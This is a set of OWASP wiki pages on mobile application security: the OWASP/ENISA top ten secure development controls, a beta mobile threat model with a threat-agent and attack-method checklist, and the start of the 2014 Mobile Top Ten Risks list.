OWASP and the European Network and Information Security Agency (ENISA) collaborated to build a joint set of controls. ENISA has published the results of the collaborative effort as the "Smartphone Secure Development Guideline": http://www.enisa.europa.eu/activities/application-security/smartphone-security-1/smartphone-secure-development-guidelines

[[File:OWASP_Mobile_Top_10_Controls.jpg|center|800px]]

==Contributors==

This document has been jointly produced with ENISA as well as the following individuals:
*Vinay Bansal, Cisco Systems
*Nader Henein, Research in Motion
*Giles Hogben, ENISA
*Karsten Nohl, Srlabs
*Jack Mannino, nVisium Security
*Christian Papathanasiou, Royal Bank of Scotland
*Stefan Rueping, Infineon
*Beau Woods, Stratigos Security

== Top 10 mobile controls and design principles==

'''[[#section control_1|1. Identify and protect sensitive data on the mobile device]]'''

'''Risks:''' Unsafe sensitive data storage, attacks on decommissioned phones unintentional disclosure: Mobile devices (being mobile) have a higher risk of loss or theft. Adequate protection should be built in to minimize the loss of sensitive data on the device.

*1.1 In the design phase, classify data storage according to sensitivity and apply controls accordingly (e.g. passwords, personal data, location, error logs, etc.). Process, store and use data according to its classification. Validate the security of API calls applied to sensitive data.
*1.2 Store sensitive data on the server instead of the client-end device. This is based on the assumption that secure network connectivity is sufficiently available and that protection mechanisms available to server side storage are superior. The relative security of client vs server-side security also needs to be assessed on a case-by-case basis (see ENISA cloud risk assessment (3) or the OWASP Cloud top 10 (4) for decision support).
*1.3 When storing data on the device, use a file encryption API provided by the OS or other trusted source. Some platforms provide file encryption APIs which use a secret key protected by the device unlock code and deleteable on remote kill. If this is available, it should be used as it increases the security of the encryption without creating extra burden on the end-user. It also makes stored data safer in the case of loss or theft. However, it should be born in mind that even when protected by the device unlock key, if data is stored on the device, its security is dependent on the security of the device unlock code if remote deletion of the key is for any reason not possible.
*1.4 Do not store/cache sensitive data (including keys) unless they are encrypted and if possible stored in a tamper-proof area (see control 2).
*1.5 Consider restricting access to sensitive data based on contextual information such as location (e.g. wallet app not usable if GPS data shows phone is outside Europe, car key not usable unless within 100m of car etc...).
*1.6 Do not store historical GPS/tracking or other sensitive information on the device beyond the period required by the application (see controls 1.7, 1.8).
*1.7 Assume that shared storage is untrusted - information may easily leak in unexpected ways through any shared storage. In particular:
**Be aware of caches and temporary storage as a possible leakage channel, when shared with other apps.
**Be aware of public shared storage such as address book, media gallery and audio files as a possible leakage channel. For example storing images with location metadata in the media-gallery allows that information to be shared in unintended ways.
**Do not store temp/cached data in a world readable directory.
*1.8 For sensitive personal data, deletion should be scheduled according to a maximum retention period, (to prevent e.g. data remaining in caches indefinitely).
*1.9 There is currently no standard secure deletion procedure for flash memory (unless wiping the entire medium/card). Therefore data encryption and secure key management are especially important.
*1.10 Consider the security of the whole data lifecycle in writing your application (collection over the wire, temporary storage, caching, backup, deletion etc)
*1.11 Apply the principle of minimal disclosure - only collect and disclose data which is required for business use of the application. Identify in the design phase what data is needed, its sensitivity and whether it is appropriate to collect, store and use each data type.
*1.12 Use non-persistent identifiers which are not shared with other apps wherever possible - e.g. do not use the device ID number as an identifier unless there is a good reason to do so (use a randomly generated number – see 4.3). Apply the same data minimization principles to app sessions as to http sessions/cookies etc.
*1.13 Applications on managed devices should make use of remote wipe and kill switch APIs to remove sensitive information from the device in the event of theft or loss. (A kill-switch is the term used for an OS-level or purpose-built means of remotely removing applications and/or data).
*1.14 Application developers may want to incorporate an application-specific "data kill switch" into their products, to allow the per-app deletion of their application's sensitive data when needed (strong authentication is required to protect misuse of such a feature).

'''2. Handle password credentials securely on the device'''

'''Risks:''' Spyware, surveillance, financial malware. A user's credentials, if stolen, not only provide unauthorized access to the mobile backend service, they also potentially compromise many other services and accounts used by the user. The risk is increased by the widespread of reuse of passwords across different services.

*2.1 Instead of passwords consider using longer term authorization tokens that can be securely stored on the device (as per the OAuth model). Encrypt the tokens in transit (using SSL/TLS). Tokens can be issued by the backend service after verifying
Smartphones secure development guidelines for app developers the user credentials initially. The tokens should be time bounded to the specific service as well as revocable (if possible server side), thereby minimizing the damage in loss scenarios. Use the latest versions of the authorization standards (such as OAuth 2.0). Make sure that these tokens expire as frequently as practicable.
*2.2 In case passwords need to be stored on the device, leverage the encryption and key-store mechanisms provided by the mobile OS to securely store passwords, password equivalents and authorization tokens. Never store passwords in clear text. Do not store passwords or long term session IDs without appropriate hashing or encryption.
*2.3 Some devices and add-ons allow developers to use a Secure Element e.g. (5) (6) – sometimes via an SD card module - the number of devices offering this functionality is likely to increase. Developers should make use of such capabilities to store keys, credentials and other sensitive data. The use of such secure elements gives a higher level of assurance with the standard encrypted SD card certified at FIPS 140-2 Level 3. Using the SD cards as a second factor of authentication though possible, isn't recommended, however, as it becomes a pseudo-inseparable part of the device once inserted and secured.
*2.4 Provide the ability for the mobile user to change passwords on the device.
*2.5 Passwords and credentials should only be included as part of regular backups in encrypted or hashed form.
*2.6 Smartphones offer the possibility of using visual passwords which allow users to memorize passwords with higher entropy. These should only be used however, if sufficient entropy can be ensured. (7)
*2.7 Swipe-based visual passwords are vulnerable to smudge-attacks (using grease deposits on the touch screen to guess the password). Measures such as allowing repeated patterns should be introduced to foil smudge-attacks. (8)
*2.8 Check the entropy of all passwords, including visual ones (see 4.1 below).
*2.9 Ensure passwords and keys are not visible in cache or logs.
*2.10 Do not store any passwords or secrets in the application binary. Do not use a generic shared secret for integration with the backend (like password embedded in code). Mobile application binaries can be easily downloaded and reverse engineered.

'''3. Ensure sensitive data is protected in transit'''

'''Risks:''' Network spoofing attacks, surveillance. The majority of smartphones are capable of using multiple network mechanisms including Wi-Fi, provider network (3G, GSM, CDMA and others), Bluetooth etc. Sensitive data passing through insecure channels could be intercepted. (9) (10)

*3.1 Assume that the provider network layer is not secure. Modern network layer attacks can decrypt provider network encryption, and there is no guarantee that the Wi-Fi network will be appropriately encrypted.
*3.2 Applications should enforce the use of an end-to-end secure channel (such as SSL/TLS) when sending sensitive information over the wire/air (e.g. using Strict Transport Security - STS (11)).This includes passing user credentials, or other authentication equivalents. This provides confidentiality and integrity protection.
*3.3 Use strong and well-known encryption algorithms (e.g. AES) and appropriate key lengths (check current recommendations for the algorithm you use e.g. (12) page 53).
*3.4 Use certificates signed by trusted CA providers. Be very cautious in allowing self- signed certificates. Do not disable or ignore SSL chain validation.
*3.5 For sensitive data, to reduce the risk of man-in-middle attacks (like SSL proxy, SSL strip), a secure connection should only be established after verifying the identity of the remote end-point (server). This can be achieved by ensuring that SSL is only established with end-points having the trusted certificates in the key chain.
*3.6 The user interface should make it as easy as possible for the user to find out if a certificate is valid.
*3.7 SMS, MMS or notifications should not be used to send sensitive data to or from mobile end-points.

'''Reference:''' Google vulnerability of Client Login account credentials on unprotected wifi - [http://www.google.com/url?q=http%3A%2F%2Fwww.uni-ulm.de%2Fin%2Fmi%2Fmitarbeiter%2Fkoenings%2Fcatching-authtokens.html&sa=D&sntz=1&usg=AFQjCNGO-Yp1KHqO8USuL0zxL1Lpwq1Usw]

'''4. Implement user authentication,authorization and session management correctly'''

'''Risks:''' Unauthorized individuals may obtain access to sensitive data or systems by circumventing authentication systems (logins) or by reusing valid tokens or cookies. (13)

*4.1 Require appropriate strength user authentication to the application. It may be useful to provide feedback on the strength of the password when it is being entered for the first time. The strength of the authentication mechanism used depends on the sensitivity of the data being processed by the application and its access to valuable resources (e.g. costing money).
*4.2 It is important to ensure that the session management is handled correctly after the initial authentication, using appropriate secure protocols. For example, require authentication credentials or tokens to be passed with any subsequent request (especially those granting privileged access or modification).
*4.3 Use unpredictable session identifiers with high entropy. Note that random number generators generally produce random but predictable output for a given seed (i.e. the same sequence of random numbers is produced for each seed). Therefore it is important to provide an unpredictable seed for the random number generator. The standard method of using the date and time is not secure. It can be improved, for example using a combination of the date and time, the phone temperature sensor and the current x,y and z magnetic fields. In using and combining these values, well-tested algorithms which maximise entropy should be chosen (e.g. repeated application of SHA1 may be used to combine random variables while maintaining maximum entropy – assuming a constant maximum seed length).
*4.4 Use context to add security to authentication - e.g. IP location, etc...
*4.5 Where possible, consider using additional authentication factors for applications giving access to sensitive data or interfaces where possible - e.g. voice, fingerprint (if available), who-you-know, behavioural etc.
*4.6 Use authentication that ties back to the end user identity (rather than the device identity).

'''5. Keep the backend APIs (services) and the platform (server) secure'''

'''Risks:''' Attacks on backend systems and loss of data via cloud storage. The majority of mobile applications interact with the backend APIs using REST/Web Services or proprietary protocols. Insecure implementation of backend APIs or services, and not keeping the back-end platform hardened/patched will allow attackers to compromise data on the mobile device when transferred to the backend, or to attack the backend through the mobile application. (14)

*5.1 Carry out a specific check of your code for sensitive data unintentionally transferred, any data transferred between the mobile device and web-server back- ends and other external interfaces - (e.g. is location or other information included within file metadata).
*5.2 All backend services (Web Services/REST) for mobile apps should be tested for vulnerabilities periodically, e.g. using static code analyser tools and fuzzing tools for testing and finding security flaws.
*5.3 Ensure that the backend platform (server) is running with a hardened configuration with the latest security patches applied to the OS, Web Server and other application components.
*5.4 Ensure adequate logs are retained on the backend in order to detect and respond to incidents and perform forensics (within the limits of data protection law).
*5.5 Employ rate limiting and throttling on a per-user/IP basis (if user identification is available) to reduce the risk from DDoS attack.
*5.6 Test for DoS vulnerabilities where the server may become overwhelmed by certain resource intensive application calls.
*5.7 Web Services, REST and APIs can have similar vulnerabilities to web applications:
**Perform abuse case testing, in addition to use case testing
**Perform testing of the backend Web Service, REST or API to determine vulnerabilities.

'''6. Secure data integration with third party services and applications'''

'''Risks:''' Data leakage. Users may install applications that may be malicious and can transmit personal data (or other sensitive stored data) for malicious purposes.

*6.1 Vet the security/authenticity of any third party code/libraries used in your mobile application (e.g. making sure they come from a reliable source, with maintenance supported, no backend Trojans)
*6.2 Track all third party frameworks/APIs used in the mobile application for security patches. A corresponding security update must be done for the mobile applications using these third party APIs/frameworks.
*6.3 Pay particular attention to validating all data received from and sent to non-trusted third party apps (e.g. ad network software) before processing within the application.

'''7. Pay specific attention to the collection and storage of consent for the collection and use of the user’s data'''

'''Risks:''' Unintentional disclosure of personal or private information, illegal data processing. In the European Union, it is mandatory to obtain user consent for the collection of personally identifiable information (PII). (15) (16)

*7.1 Create a privacy policy covering the usage of personal data and make it available to the user especially when making consent choices.
*7.2 Consent may be collected in three main ways:
**At install time
**At run-time when data is sent
**Via “opt-out” mechanisms where a default setting is implemented and the user has to turn it off.
*7.3 Check whether your application is collecting PII - it may not always be obvious - for example do you use persistent unique identifiers linked to central data stores containing personal information?
*7.4 Audit communication mechanisms to check for unintended leaks (e.g. image metadata).
*7.5 Keep a record of consent to the transfer of PII. This record should be available to the user (consider also the value of keeping server-side records attached to any user data stored). Such records themselves should minimise the amount of personal data they store (e.g. using hashing).
*7.6 Check whether your consent collection mechanism overlaps or conflicts (e.g. in the data handling practices stated) with any other consent collection within the same stack (e.g. APP-native + webkit HTML) and resolve any conflicts.

'''8. Implement controls to prevent unauthorized access to paid-for resources (wallet, SMS, phone calls etc.)'''
'''Risks:''' Smartphone apps give programmatic (automatic) access to premium rate phone calls, SMS, roaming data, NFC payments, etc. Apps with privileged access to such API’s should take particular care to prevent abuse, considering the financial impact of vulnerabilities that giveattackers access to the user’s financial resources.

*8.1 Maintain logs of access to paid-for resources in a non-repudiable format (e.g. a signed receipt sent to a trusted server backend – with user consent) and make them available to the end-user for monitoring. Logs should be protected from unauthorised access.
*8.2 Check for anomalous usage patterns in paid-for resource usage and trigger re- authentication. E.g. when significant change in location occurs, user-language changes etc.
*8.3 Consider using a white-list model by default for paid-for resource addressing - e.g. address book only unless specifically authorised for phone calls.
*8.4 Authenticate all API calls to paid-for resources (e.g. using an app developer certificate).
*8.5 Ensure that wallet API callbacks do not pass cleartext account/pricing/ billing/item information.
*8.6 Warn user and obtain consent for any cost implications for app behaviour.
*8.7 Implement best practices such as fast dormancy (a 3GPP specification), caching, etc. to minimize signalling load on base stations.

'''9. Ensure secure distribution/provisioning of mobile applications'''

'''Risks:''' Use of secure distribution practices is important in mitigating all risks described in the OWASP Mobile Top 10 Risks and ENISA top 10 risks.
*9.1 Applications must be designed and provisioned to allow updates for security patches, taking into account the requirements for approval by app-stores and the extra delay this may imply.
*9.2 Most app-stores monitor apps for insecure code and are able to remotely remove apps at short notice in case of an incident. Distributing apps through official app- stores therefore provides a safety-net in case of serious vulnerabilities in your app.
*9.3Provide feedback channels for users to report security problems with apps – e.g. a security@ email address.

'''10. Carefully check any runtime interpretation of code for errors '''

'''Risks:''' Runtime interpretation of code may give an opportunity for untrusted parties to provide unverified input which is interpreted as code. For example, extra levels in a game, scripts, interpreted SMS headers. This gives an opportunity for malware to circumvent walled garden controls provided by app-stores. It can lead to injection attacks leading to Data leakage, surveillance, spyware, and diallerware.

Note that it is not always obvious that your code contains an interpreter. Look for any capabilities accessible via user-input data and use of third party API’s which may interpret user-input - e.g. JavaScript interpreters.

*10.1 Minimize runtime interpretation and capabilities offered to runtime interpreters: run interpreters at minimal privilege levels.
*10.2 Define comprehensive escape syntax as appropriate.
*10.3 Fuzz test interpreters.
*10.4 Sandbox interpreters.

''Appendix A- Relevant General Coding Best Practices'''

Some general coding best practices are particularly relevant to mobile coding. We have listed some of the most important tips here:
**Perform abuse case testing, in addition to use case testing.
**Validate all input.
**Minimise lines and complexity of code. A useful metric is cyclomatic complexity (17).
**Use safe languages (e.g. from buffer-overflow).
**Implement a security report handling point (address) security@example.com
**Use static and binary code analysers and fuzz-testers to find security flaws.
**Use safe string functions, avoid buffer and integer overflow.
**Run apps with the minimum privilege required for the application on the operating
system. Be aware of privileges granted by default by APIs and disable them.
**Don't authorize code/app to execute with root/system administrator privilege
**Always perform testing as a standard as well as a privileged user
**Avoid opening application-specific server sockets (listener ports) on the client device.
Use the communication mechanisms provided by the OS.
**Remove all test code before releasing the application
**Ensure logging is done appropriately but do not record excessive logs, especially those
including sensitive user information.

''Appendix B- Enterprise Guidelines''
**If a business-sensitive application needs to be provisioned on a device, applications should enforce of a higher security posture on the device (such as PIN, remote management/wipe, app monitoring)
**Device certificates can be used for stronger device authentication.'

''References"
*1.ENISA. Top Ten Smartphone Risks . [Online] http://www.enisa.europa.eu/act/application-security/smartphone-security-1/top-ten-risks.
*2. OWASP. Top 10 mobile risks. [Online] https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks.
*3. Cloud Computing: Benefits, Risks and Recommendations for information security. [Online] 2009. http://www.enisa.europa.eu/act/rm/files/deliverables/cloud-computing-risk-assessment.
*4. OWASP Cloud Top 10. [Online] https://www.owasp.org/index.php/Category:OWASP_Cloud_%E2%80%90_10_Project.
*5. Blackberry developers documents. [Online] http://www.blackberry.com/developers/docs/7.0.0api/net/rim/device/api/io/nfc/se/SecureElement.h tml,.
*6. Google Seek For Android. [Online] http://code.google.com/p/seek-for-android/.
*7. Visualizing Keyboard Pattern Passwords. [Online] cs.wheatoncollege.edu/~mgousie/comp401/amos.pdf.
*8. Smudge Attacks on Smartphone Touch Screens. Adam J. Aviv, Katherine Gibson, Evan Mossop, Matt Blaze, and Jonathan M. Smith. s.l. : Department of Computer and Information Science – University of Pennsylvania.
*9. Google vulnerability of Client Login account credentials on unprotected . [Online] http://www.uni- ulm.de/in/mi/mitarbeiter/koenings/catching-authtokens.html.
*10. SSLSNIFF. [Online] http://blog.thoughtcrime.org/sslsniff-anniversary-edition. 11. [Online] http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-02.
Smartphones secure development guidelines for app developers
*11. [Online] http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-02.
*12. NIST Computer Security. [Online] http://csrc.nist.gov/publications/nistpubs/800-57/sp800- 57_PART3_key-management_Dec2009.pdf.
*13. Google's ClientLogin implementation . [Online] http://www.uni- ulm.de/in/mi/mitarbeiter/koenings/catching-authtokens.html.
*14. [Online] https://www.owasp.org/index.php/Web_Services.
*15. EU Data Protection Directive 95/46/EC. [Online] http://eur- lex.europa.eu/LexUriServ/LexUriServ.do?uri=CELEX:31995L0046:en:HTML.
*16. [Online] http://democrats.energycommerce.house.gov/sites/default/files/image_uploads/Testimony_05.04.11 _Spafford.pdf.
*17. [Online] http://www.aivosto.com/project/help/pm-complexity.html.
*18. [Online] http://code.google.com/apis/accounts/docs/AuthForInstalledApps.html.
**19. Google Wallet Security. [Online] http://www.google.com/wallet/how-it-works-security.htm.

= OWASP Mobile Threat Model Project =
==Mobile Application Threat Model - Beta Release==

This is the first release (February 2013) of the Mobile Application Threat Model developed by the initial project team (listed at the end of this release). Development began mid-2011 and is being released in beta form for public comment and input. It is by no means complete and some sections will need more contributions, details and also real world case studies. It's the hope of the project team that others in the community can help contribute to this project to further enhance and improve this threat model.

===Mobile Threat Model Introduction Statement===
Threat modeling is a systematic process that begins with a clear understanding of the system. It is necessary to define the following areas to understand possible threats to the application:
* '''Mobile Application Architecture''' - This area describes how the application is designed from device specific features used by the application, wireless transmission protocols, data transmission mediums, interaction with hardware components and other applications.
* '''Mobile Data''' - What data does the application store and process? What is the business purpose of this data and what are the data workflows?
* '''Threat Agent Identification''' - What are the threats to the mobile application and who are the threat agents. This area also outlines the process for defining what threats apply to the mobile application.
* '''Methods of Attack''' - What are the most common attacks utilized by threat agents. This area defines these attacks so that controls can be developed to mitigate attacks.
* '''Controls''' - What are the controls to prevent attacks. This is the last area to be defined only after previous areas have been completed by the development team.

===Target Audience for the Mobile Threat Model===
This model is to be used by mobile application developers and software architects as part of the “threat modeling” phase of a typical SDLC process. The model can also be used by Information Security Professionals that need to determine what typical mobile application threats are and provide a methodology for conducting basic threat modeling.

===How to Use the Mobile Threat Model===
This threat model is designed as an outline or checklist of items that need to be documented, reviewed and discussed when developing a mobile application. Every organization that develops mobile applications will have different requirements as well as threats. This model was designed to be as organizational and industry agnostic as possible so that any mobile application development team can use this as a guide for conducting threat modeling for their specific application. Real world case studies as examples will be integrated to this threat model in the near future.

==Mobile Application Architecture==

The mobile application architecture should, at the very least, describe device specific features used by the application, wireless transmission protocols, data transmission medium, interaction with hardware components and other applications. Applications can be mapped to this architecture as a preliminary attack surface assessment.

===Architecture Considerations===

Although mobile applications vary in function, they can be described using a generalized model as follows:

Wireless interfaces

Transmission Type

Hardware Interaction

Interaction with on device applications/services

Interaction with off device applications/services

Encryption Protocols

* What is the design of the architecture (network infrastructure, web services, trust boundaries, third-party APIs, etc)
** Carrier
*** Data
*** SMS
*** Voice
** Endpoints
*** Web Services
**** RESTful or SOAP based
**** Third Party (Example: Amazon)
*** Websites
**** Does the app utilize or integrate the “mobile web” version of an existing web site?
*** App Stores
**** Google Play
**** Apple App Store
**** Windows Mobile
**** BlackBerry App Store
*** Cloud Storage
**** Amazon/Azure
*** Corporate Networks (via VPN, ssh, etc.)
** Wireless interfaces
*** 802.11
*** NFC
*** Bluetooth
*** RFID
** Device
*** App Layer
*** Runtime Environment (VM, framework dependencies, etc)
*** OS Platform
** Apple iOS
** Android
** Windows Mobile
** BlackBerry
*** Baseband
* Common hardware components
** GPS
** Sensors (accelerometer)
** Cellular Radios (GSM/CDMA/LTE)
** Flash Memory
** Removable Storage (i.e.- SD)
** USB ports
** Wireless Interfaces
*** 802.11
*** Bluetooth
*** NFC
*** RFID
** Touch Screen
** Hardware Keyboard
** Microphone
** Camera
* Authentication
** Method
*** Knowledge based
*** Token based
*** Biometrics
** Input Type
*** Keyboard
*** Touch screen
*** Hardware peripheral
** Decision Process
*** Local (on device)
*** Remote (off device)
* Define app architecture relative to OS stack + security model
** What should or shouldn't the app do?

==Mobile Data==
This section defines what purpose does the app serve from a business perspective and what data the app store, transmit and receive. It’s also important to review data flow diagrams to determine exactly how data is handled and managed by the application.

* What is the business function of the app?
* What data does the application store/process (provide data flow diagram)
** This diagram should outline network, device file system and application data flows
** How is data transmitted between third party API’s and app(s)
** Are there different data handling requirements between different mobile platforms? (iOS/Android/Blackberry/Windows/J2ME)
** Does the app use cloud storage APIs (Dropbox, Google Drive, iCloud, Lookout) for device data backups
** Does personal data intermingle with corporate data?
** Is there specific business logic built into the app to process data?
* What does the data give you (or an attacker) access to
** Data at Rest
** Example: Do stored credentials provide authentication?
** Data in Transit
** Example: Do stored keys allow you to break crypto functions (data integrity)?
* Third party data, is it being stored/transmitted?
** What is the privacy requirements of user data
** Example: UDID or Geolocation on iOS transmitted to 3rd party
** Are there regulatory requirements to meet specific to user privacy?
* How does other data on the device affect the app (sandboxing restrictions enforced?)
** Example: Authentication credentials shared between apps
* What is the impact of Jailbroken/Rooted vs Non Jailbroken/Rooted device and how this affects app data (can also relate to threat agent identification)

==Threat Agent Identification==
What are the threats to the mobile application and who are the threat agents. This area also outlines the process for defining what threats apply to the mobile application.

===Identifying Threat Agents===

The process of identifying a threat agent is very simple and have been mentioned in the below steps:

'''S1''': Take the list of all sensitive data (or information to protect) listed down from Section 2 – Mobile Data

'''S2:''' Make a list of all the ways to access this data

'''S3:''' The medium used to access the same listed in S3 is the Threat Agent to be identified

===Threat Agent Identification Example===

Let us understand it in a better way using an example of a Financial Application (specifically a Banking Application). Following the process as mentioned above:

'''S1:''' Sensitive data present in the application has been listed as: Beneficiary Details stored in some form in the Phone Application Memory and User Credentials used for authentication transmitted to the server.
'''S2:''' List the various ways of accessing information:

# Beneficiary Details:
## A device user aiming to browse through the memory card / phone memory
## An adversary using a jail broken phone; starts reading the content through putty/WinSCP via SSH
## An adversary while sniffing the WiFi, traffic sniffs the content travelling through the network
## Another malicious application while reading the phone memory contents, stumbles upon this data as the device is Jailbroken
## Another application which is sending data through SMS sends this data.
## A Web Application executing a script on the browser tries to get steal the phone memory and send it to its server.

'''S3:''' From the above points, we list down the medium used:

# Any user who has the device (Stolen device/ friend / etc)
## Any malicious application (installed / Web based script)
## An adversary sniffing the Wifi.
## etc.

From the above example you should have a clear picture on how to identify Threat Agents. Below is list of threat agents, which were identified while analyzing various commonly used applications.

===Listing of Threat Agents - By Category===

====Human Interaction====

* '''Stolen Device User:''' A user who obtained unauthorized access to the device aiming to get hold of the memory related sensitive information belonging to the owner of the device.

* '''Owner of the Device:''' A user who unwillingly has installed a malicious application on his phone which gains access to the device application memory.

* '''Common WiFi Network User:''' This agent is aimed at any adversary intentionally or unintentionally sniffing the WiFi network used by a victim. This agent stumbles upon all the data transmitted by the victim device and may re-use it to launch further attacks.

* '''Malicious Developer:''' A human user who has the intent of writing an application which not only provides a commonly known function like gaming / calculator / utility in the foreground but steal as much information from your device as possible in real-time and transmits it to the malicious user. This agent can also be looked at an angle from which he codes an app to perform DOS by using up all the device resources.

* '''Organization Internal Employees:''' Any user who is part of the organization (may be a programmer / admin / user / etc). Anyone who has privileges to perform an action on the application.

* '''App Store Approvers/Reviewers:''' Any app store which fails to review potentially dangerous code or malicious application which executes on a user’s device and performs suspicious/ malicious activities

====Automated Programs====

* '''Malware on the device''': Any program / mobile application which performs suspicious activity. It can be an application, which is copying real time data from the user’s device and transmitting it to any server. This type of program executes parallel to all the processes running in the background and stays alive performing malicious activity all the time. E.g. Olympics App which stole text messages and browsing history:[http://venturebeat.com/2012/08/06/olympics-android-app/ ][http://venturebeat.com/2012/08/06/olympics-android-app/ http://venturebeat.com/2012/08/06/olympics-android-app/]

* '''Scripts executing at the browser with HTML5''': Any script code written in a language similar to JavaScript having capability of accessing the device level content falls under this type of agent section. A script executing at the browser reading and transmitting browser memory data / complete device level data.

* '''Malicious SMS''': An incoming SMS redirected to trigger any kind of suspicious activity on the mobile device. There are multiple services which keep running in the background. Each of these services have listeners which might be active to listen for the content of an incoming SMS. An SMS message may be a sort of trigger for the service to perform some suspicious activity.

* '''Malicious App:''' Failure to detect malicious or vulnerable code and the likelihood of a compromise or attack against the app store itself, potentially turning legitimate code into hostile things including updates and new downloaded apps.

Below is a diagram illustrated to understand the Threat Agents and Threats in a visual manner:

[[image:Mobile-app-threat-agents.png|582x527px]]

'''Figure 1 : Pictorial Representation of Threats and Agents'''

==Methods of Attack==
In this section, we will observe different methods an attacker can use to reach the data. This data can be sensitive information to the device or something sensitive to the app itself.

===Attack’s Flowchart===

Destruction of the asset is normally classified as attack. Attack can be further categorized as a planned attack or an unplanned one. Unintended attacks are normally caused due to some form of accidental actions.

[[image:Mobile-app-attack-workflow.png]]

'''Figure 2: Attack Workflow'''

===Attack Scenario===

'''“Method aimed to read the local application memory”'''

The above mentioned attack methodology is the one in which the data which is targeted is application specific memory and the method used is memory based analysis. The attacker steals any sensitive data like passwords, userid, user account information which is stored in the application memory by reading the device memory.

We have listed down other methods below which can be mapped with the second section in a similar fashion:

The classification of attacks based on the way data is handled:

* Carrier Based Methods

# Man in the middle (MiTM) attacks which can steal data packets including SMS or voice packets
# Hijack wireless transmission.

* Endpoints based methods

# Inject code to tamper with web application or web services
# Many of the OWASP Mobile Top 10/OWASP Web Application Top 10
# Publishing Malwares in the app store
# Stealing user sensitive phone contents using Malwares
# Cloud storage
# Targeting malicious corporate network. (e.g. VPN Keys, etc)

* Wireless interfaces based methods

# Stealing data when its in-transit using wireless channel like 802.11, NFC based data exchange or Bluetooth based data exchange. Application Level Attacks

* OS and application level methods

# Exploit the Input validation on client-side by by-passing the checks
# An adversary steals sensitive data by reading SD Card based stored content
# Exploiting vulnerabilities within an app or runtime environment. (VM, framework dependencies, etc)
# An adversary exploits OS level functionalities steal data from device or server
# Rooting or Jailbreaking the phone to access sensitive data from memory

* Miscellaneous Methods

# Method used to exploit and steal GPS based signals which falls in users personal information
# Method used to exploit the flash memory
# Method used to perform “tap jacking” based attacks.
# Method used to steal keyboard cache or logs.
# Method used to steal microphone recordings of a user
# Method used to exploit and misuse the camera functionality.

==Controls==
What are the controls to prevent attacks. This is the last area to be defined only after previous areas have been completed by the development team.

* What are the controls to prevent an attack?
** Defined by platform
*** Apple iOS
*** Android
*** Windows Mobile
*** BlackBerry
* What are the controls to detect an attack?
** Defined by platform
*** Apple iOS
*** Android
*** Windows Mobile
*** BlackBerry
* What are the controls to mitigate/minimize impact of an attack?
** Defined by platform
*** Apple iOS
*** Android
*** Windows Mobile
*** BlackBerry
* What are the controls to protect users private information (privacy controls)
** Example: prompts for access to address book/geolocation
* Create a mapping of controls to each specific method of attack (defined in Section 4 – Methods of Attack)
** Create level of assurance framework based on controls implemented. This would be subjective to a certain point, but it would be useful in guiding organizations who want to achieve a certain level of risk management based on the threats and vulnerabilities
* Case studies, control examples

==Project Contributors==
Special thanks to the following team members who contributed to the initial release of the threat model:

Tom Eston (Project Lead)

Jack Mannino

Sreenarayan Ashokkumar

Swapnil Deshmukh

Brandon Knight

Steve Jensen

Shimon Modi

Rodrigo Marcos

Brandon Clark

Yvesmarie Quemener

Yashraj Paralikar

Ritesh Taank

__NOTOC__ <headertabs />

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-02-25T01:00:37Z

Jason Haddix:

<center><br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
== About this list ==
In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our road-map for 2014 includes:
[[File:2014-01-26 20-23-29.png|right|550px]]
* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

This list is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads.

Feel free to visit [https://groups.google.com/a/owasp.org/forum/#!forum/owasp-mobile-top-10-risks the mailing list] as well!

== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ==
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
